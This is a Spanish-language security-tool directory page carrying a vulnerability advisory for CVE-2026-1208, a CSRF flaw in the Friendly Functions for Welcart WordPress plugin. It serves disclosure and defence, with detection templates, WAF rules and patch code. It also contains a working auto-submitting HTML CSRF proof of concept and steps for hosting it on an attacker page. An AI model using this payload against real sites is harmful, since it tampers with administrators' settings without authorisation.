Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-1208 — Friendly Functions for Welcart <= 1.2.5 - Falsificación de Solicitudes entre Sitios para Actualización de Ajustes | Kitploit
Herramientas/GitHubGitHub/snailsploit/cve-2026-1208
Análisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de PenetraciónPapers e InvestigaciónAprendizaje y Educación
GitHubsnailsploit/cve-2026-1208

CVE-2026-1208

Friendly Functions for Welcart <= 1.2.5 - Falsificación de Solicitudes entre Sitios para Actualización de Ajustes

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-1208: Falsificación de Solicitudes entre Sitios en Friendly Functions for Welcart

CVE CVSS Score WordPress Plugin CWE-352 Wordfence

Palabras clave: CVE-2026-1208, vulnerabilidad en Friendly Functions for Welcart, CSRF, Falsificación de Solicitudes entre Sitios, seguridad de WordPress, vulnerabilidad de plugin de WordPress, CWE-352, seguridad de Welcart, manipulación de ajustes, CVE 2026 de WordPress

Tabla de contenidos

  • Descripción general
  • Detalles de la vulnerabilidad
  • Análisis técnico
  • Vector de ataque
  • Prueba de concepto
  • Guía de remediación
  • Métricas CVSS
  • Referencias
  • Contacto de seguridad

Descripción general

Vulnerabilidad CSRF en el plugin de WordPress Friendly Functions for Welcart (CVE-2026-1208) - Fallo de seguridad que permite a atacantes no autenticados modificar los ajustes del plugin mediante solicitudes falsificadas.

Se descubrió una vulnerabilidad de Falsificación de Solicitudes entre Sitios (CSRF) en el plugin Friendly Functions for Welcart que permite a atacantes no autenticados actualizar los ajustes del plugin engañando a un administrador para que haga clic en un enlace malicioso.

Descubierto por: Kai Aizen (SnailSploit)
Publicado: 23 de enero de 2026
Puntuación CVSS: 4.3 (Media)
CWE: CWE-352 - Falsificación de Solicitudes entre Sitios (CSRF)
Plugin: Friendly Functions for Welcart
Tipo de ataque: Falsificación de Solicitudes entre Sitios para actualización de ajustes
Privilegios requeridos: Ninguno (Ataque no autenticado + Ingeniería social)

Detalles de la vulnerabilidad

Descripción

El plugin Friendly Functions for Welcart para WordPress es vulnerable a Falsificación de Solicitudes entre Sitios en todas las versiones hasta la 1.2.5 inclusive. Esto se debe a la ausencia o a una validación incorrecta de nonce en la página de ajustes. Esto permite que atacantes no autenticados actualicen los ajustes del plugin mediante una solicitud falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace.

Impacto

Esta vulnerabilidad permite a atacantes no autenticados:

  • Modificar los ajustes del plugin sin autorización
  • Manipular la funcionalidad de comercio electrónico de Welcart
  • Interrumpir potencialmente las operaciones de la tienda
  • Encadenarse con otras vulnerabilidades para ataques escalados

Versiones afectadas

  • Vulnerable: Todas las versiones ≤ 1.2.5
  • Corregida: Versión 1.2.6 y posterior

Métricas CVSS v3.1

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Detalles técnicos

La vulnerabilidad se encuentra en la implementación de la página de ajustes, donde:

  1. El formulario de ajustes del plugin carece de una validación de nonce adecuada
  2. Las solicitudes de actualización de ajustes se procesan sin verificar el origen de la solicitud
  3. No se generan ni se validan tokens CSRF
  4. Se pueden realizar acciones administrativas mediante solicitudes de origen cruzado

Ubicaciones del código vulnerable

La vulnerabilidad se identificó en las siguientes ubicaciones:

  • ffw_function_settings.php - Línea 53
  • ffw_function_settings.php - Línea 58

Vector de ataque

El ataque requiere ingeniería social para engañar a un administrador autenticado para que visite una página maliciosa o haga clic en un enlace manipulado mientras está conectado a su sitio de WordPress.

root@kitploit:~
Target: WordPress Admin with Friendly Functions for Welcart installed
Method: Malicious HTML page with auto-submitting form
Trigger: Administrator clicks link or visits attacker-controlled page

Prueba de concepto

Payload HTML de CSRF

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-1208 - CSRF PoC</title>
</head>
<body>
    <h1>Loading...</h1>
    <form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
        <input type="hidden" name="ffw_setting_option" value="malicious_value" />
        <!-- Add additional setting fields as needed -->
    </form>
    <script>
        document.getElementById('csrf-form').submit();
    </script>
</body>
</html>

⚠️ Advertencia: Este PoC se proporciona únicamente con fines educativos y de pruebas autorizadas.

Pasos de prueba

  1. Configura una instancia de WordPress con Friendly Functions for Welcart <= 1.2.5
  2. Aloja el payload CSRF en un servidor controlado por el atacante
  3. Autentícate como administrador en el sitio de WordPress objetivo
  4. Visita la página controlada por el atacante (simulando hacer clic en un enlace malicioso)
  5. Observa que los ajustes del plugin se modifican sin consentimiento explícito

Detección

Comprobación del plugin de WordPress

root@kitploit:~
# Check if vulnerable version is installed
wp plugin list | grep -i "friendly-functions-for-welcart"

# Get specific version
wp plugin get friendly-functions-for-welcart --field=version

Reglas del escáner de seguridad

Plantilla de Nuclei:

root@kitploit:~
id: CVE-2026-1208

info:
  name: Friendly Functions for Welcart - CSRF to Settings Update
  author: SnailSploit
  severity: medium
  description: |
    Friendly Functions for Welcart plugin for WordPress is vulnerable 
    to CSRF in versions <= 1.2.5 due to missing nonce validation.
  reference:
    - https://github.com/SnailSploit/CVE-2026-1208
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-1208
    cwe-id: CWE-352
  tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Friendly Functions for Welcart"
      
      - type: regex
        regex:
          - "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
      
      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "(?i)Stable tag:\\s*([0-9.]+)"

Reglas del firewall de aplicaciones web

Regla de ModSecurity:

root@kitploit:~
# CVE-2026-1208 - Block CSRF attempts to FFW settings
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
    "chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
    log,deny,status:403,msg:'CVE-2026-1208 CSRF Attempt Blocked'"
    SecRule ARGS:page "@streq ffw-settings" \
        "chain"
        SecRule &REQUEST_HEADERS:Referer "@eq 0"

# Alternative: Block if referer doesn't match site domain
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
    "chain,id:2026002,phase:2,t:none,\
    log,deny,status:403,msg:'CVE-2026-1208 Cross-Origin Request Blocked'"
    SecRule ARGS:page "@streq ffw-settings" \
        "chain"
        SecRule REQUEST_HEADERS:Referer "!@contains yourdomain.com"

Regla de Nginx:

root@kitploit:~
# CVE-2026-1208 - CSRF Protection for FFW Settings
location /wp-admin/admin.php {
    # Check for ffw-settings page without proper referer
    if ($arg_page = "ffw-settings") {
        set $csrf_check "1";
    }
    if ($http_referer !~ "^https?://(www\.)?yourdomain\.com") {
        set $csrf_check "${csrf_check}1";
    }
    if ($csrf_check = "11") {
        return 403;
    }
    
    # Pass to PHP handler
    try_files $uri =404;
    fastcgi_pass php-fpm;
    include fastcgi_params;
}

Remediación

Para administradores de sitio

Se requiere acción inmediata:

  1. Actualiza inmediatamente a la versión 1.2.6 o posterior de Friendly Functions for Welcart
  2. Revisa los ajustes del plugin de tu sitio para detectar modificaciones no autorizadas
  3. Si no puedes actualizar de inmediato, considera desactivar temporalmente el plugin

Instrucciones de actualización

  1. En el administrador de WordPress, ve a Plugins > Plugins instalados
  2. Localiza «Friendly Functions for Welcart»
  3. Haz clic en Actualizar ahora para actualizar a la versión 1.2.6 o posterior
  4. Verifica que la actualización se haya completado correctamente
  5. Revisa y confirma que los ajustes del plugin son correctos

Para desarrolladores

Asegúrate de que todos los formularios de ajustes implementen una protección CSRF adecuada:

root@kitploit:~
// Example of proper CSRF protection in WordPress
// In your form:
wp_nonce_field('ffw_settings_update', 'ffw_settings_nonce');

// In your form handler:
function process_settings_update() {
    // Verify nonce
    if (!isset($_POST['ffw_settings_nonce']) || 
        !wp_verify_nonce($_POST['ffw_settings_nonce'], 'ffw_settings_update')) {
        wp_die('Security check failed');
    }
    
    // Check capabilities
    if (!current_user_can('manage_options')) {
        wp_die('Unauthorized');
    }
    
    // Process settings update
    // ...
}

Cronología

  • 23 de enero de 2026 - Vulnerabilidad divulgada públicamente
  • 23 de enero de 2026 - CVE-2026-1208 asignado
  • Versión 1.2.6 - Parche publicado por el proveedor del plugin

Referencias

  • Entrada de la base de datos de inteligencia de Wordfence
  • WordPress Plugin Trac - Línea 53
  • WordPress Plugin Trac - Línea 58
  • Conjunto de cambios del plugin (Parche)
  • Entrada CVE de MITRE

Créditos

Investigador:

  • Kai Aizen - SnailSploit

Proceso de divulgación: Coordinado a través del Programa de Bug Bounty de Wordfence

Descargo de responsabilidad

Esta información se proporciona únicamente con fines de investigación de seguridad y defensa. Cualquier explotación de esta vulnerabilidad con fines maliciosos es ilegal y poco ética. Obtén siempre la autorización adecuada antes de probar sistemas que no te pertenecen.

Contacto

Para preguntas o información adicional sobre esta vulnerabilidad:

  • Correo electrónico: [email protected]
  • Sitio web: snailsploit.com
  • Organización: SnailSploit Security Research

Última actualización: 23 de enero de 2026


📚 Documentación y autor

El análisis completo de este proyecto, la metodología y la investigación relacionada se encuentran en:

https://snailsploit.com/security-research/cves/cve-2026-1208/

Creado por Kai Aizen — investigador independiente de seguridad ofensiva.

snailsploit.com · Investigación · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

El mismo ataque. Diferente sustrato.

Descargar herramienta
MétricaValor
Vector de ataqueRed (AV:N)
Complejidad del ataqueBaja (AC:L)
Privilegios requeridosNinguno (PR:N)
Interacción del usuarioRequerida (UI:R)
AlcanceSin cambios (S:U)
ConfidencialidadNinguna (C:N)
IntegridadBaja (I:L)
DisponibilidadNinguna (A:N)